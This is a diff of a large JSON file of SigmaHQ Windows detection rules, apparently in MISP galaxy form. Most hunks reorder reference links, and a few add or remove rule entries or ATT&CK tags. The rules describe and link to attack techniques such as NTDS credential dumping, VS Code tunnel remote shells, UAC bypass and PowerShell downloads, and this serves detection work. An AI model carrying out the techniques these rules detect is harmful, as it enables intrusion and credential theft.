"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ @@ -76847,8 +77021,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml" ], "tags": [ @@ -76919,40 +77093,6 @@ "uuid": "241e802a-b65e-484f-88cd-c2dc10f9206d", "value": "Read Contents From Stdin Via Cmd.EXE" }, - { - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2022/02/25", - "falsepositive": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" - ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "related": [ - { - "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", - "value": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly" - }, { "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "meta": { @@ -76966,8 +77106,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" ], "tags": [ @@ -77001,9 +77141,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://badoption.eu/blog/2023/01/31/code_c2.html", - "https://code.visualstudio.com/docs/remote/tunnels", "https://ipfyx.fr/post/visual-studio-code-tunnel/", + "https://code.visualstudio.com/docs/remote/tunnels", + "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml" ], "tags": [ @@ -77176,9 +77316,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://twitter.com/tccontre18/status/1480950986650832903", "https://twitter.com/mrd0x/status/1461041276514623491", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml" ], "tags": [ @@ -77211,9 +77351,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt", "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", - "https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml" ], "tags": [ @@ -77446,8 +77586,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", "https://www.echotrail.io/insights/search/ilasm.exe", + "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" ], "tags": [ @@ -77655,9 +77795,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", - "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml" ], "tags": [ @@ -77774,8 +77914,8 @@ "logsource.product": "windows", "refs": [ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://www.gpg4win.de/documentation.html", "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", + "https://www.gpg4win.de/documentation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml" ], "tags": [ @@ -77799,9 +77939,9 @@ "logsource.product": "windows", "refs": [ "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml" ], "tags": [ @@ -77834,8 +77974,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml" ], "tags": [ @@ -77868,8 +78008,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", "https://forensafe.com/blogs/typedpaths.html", + "https://twitter.com/dez_/status/1560101453150257154", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml" ], "tags": [ @@ -77968,9 +78108,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/blog/lnk-between-browsers", - "https://redcanary.com/blog/chromeloader/", "https://emkc.org/s/RJjuLa", + "https://redcanary.com/blog/chromeloader/", + "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml" ], "tags": [ @@ -78139,9 +78279,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://twitter.com/bohops/status/980659399495741441", "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://twitter.com/bohops/status/980659399495741441", + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://twitter.com/JohnLaTwC/status/1223292479270600706", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml" @@ -78223,13 +78363,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -78260,8 +78400,8 @@ "refs": [ "https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode", - "https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", "https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html", + "https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml" ], "tags": [ @@ -78294,12 +78434,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/993298228840992768", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + "https://twitter.com/pabraeken/status/993298228840992768", "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], "tags": [ + "attack.defense_evasion", "attack.t1218" ] }, @@ -78452,8 +78593,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml" ], "tags": [ @@ -78487,8 +78628,8 @@ "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", - "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml" ], "tags": [ @@ -78610,9 +78751,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml" ], "tags": [ @@ -78645,10 +78786,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", - "https://twitter.com/nas_bench/status/1535322450858233858", "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://twitter.com/nas_bench/status/1535322450858233858", + "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml" ], "tags": [ @@ -78714,8 +78855,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" ], "tags": [ @@ -79022,8 +79163,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md", "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml" ], "tags": [ @@ -79090,13 +79231,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://pentestlab.blog/tag/ntds-dit/", "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/zcgonvh/NTDSDumpEx", - "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", - "https://pentestlab.blog/tag/ntds-dit/", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ @@ -79305,10 +79446,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://twitter.com/M_haggis/status/1699056847154725107", "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content", "https://twitter.com/JAMESWT_MHT/status/1699042827261391247", + "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml" ], "tags": [ @@ -79466,12 +79607,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/", - "https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/", "https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior", - "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic", "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar", + "https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/", + "https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/", "https://nwgat.ninja/getting-system-information-with-wmic-on-windows/", + "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml" ], "tags": [ @@ -79504,9 +79645,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_download.yml" ], "tags": [ @@ -79629,8 +79770,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ @@ -79696,9 +79837,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml" ], "tags": [ @@ -79869,12 +80010,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", "https://www.attackiq.com/2023/09/20/emulating-rhysida/", + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI", + "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", "https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper", "https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior", - "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml" ], "tags": [ @@ -79916,8 +80057,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml" ], @@ -80028,8 +80169,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml" ], "tags": [ @@ -80104,9 +80245,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0", - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" ], "tags": [ @@ -80149,8 +80290,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml" ], "tags": [ @@ -80216,8 +80357,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml" ], "tags": [ @@ -80273,11 +80414,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", - "https://github.com/cloudflare/cloudflared", - "https://www.intrinsec.com/akira_ransomware/", - "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", "https://github.com/cloudflare/cloudflared/releases", + "https://github.com/cloudflare/cloudflared", + "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", + "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", + "https://www.intrinsec.com/akira_ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml" ], "tags": [ @@ -80343,8 +80484,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1463526834918854661", "https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5", + "https://twitter.com/mrd0x/status/1463526834918854661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml" ], "tags": [ @@ -80443,8 +80584,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1465058133303246867", "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", + "https://twitter.com/mrd0x/status/1465058133303246867", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml" ], "tags": [ @@ -80531,6 +80672,32 @@ "uuid": "f7375e28-5c14-432f-b8d1-1db26c832df3", "value": "Potential Arbitrary DLL Load Using Winword" }, + { + "description": "Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2024/02/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_download_susp_file_sharing_domains.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", + "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", + "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", + "https://labs.withsecure.com/publications/fin7-target-veeam-servers", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "b6e04788-29e1-4557-bb14-77f761848ab8", + "value": "Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE" + }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", "meta": { @@ -80586,9 +80753,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], "tags": [ @@ -80688,8 +80855,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml" ], "tags": [ @@ -80873,9 +81040,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://ss64.com/bash/rar.html", - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml" ], "tags": [ @@ -80908,15 +81075,15 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3", - "https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a", - "https://www.group-ib.com/blog/apt41-world-tour-2021/", - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", + "https://www.group-ib.com/blog/apt41-world-tour-2021/", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml" ], "tags": [ @@ -80997,9 +81164,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/netero1010/TrustedPath-UACBypass-BOF", "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml" ], "tags": [ @@ -81243,14 +81410,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", + "https://en.wikipedia.org/wiki/IExpress", "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", - "https://en.wikipedia.org/wiki/IExpress", - "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", 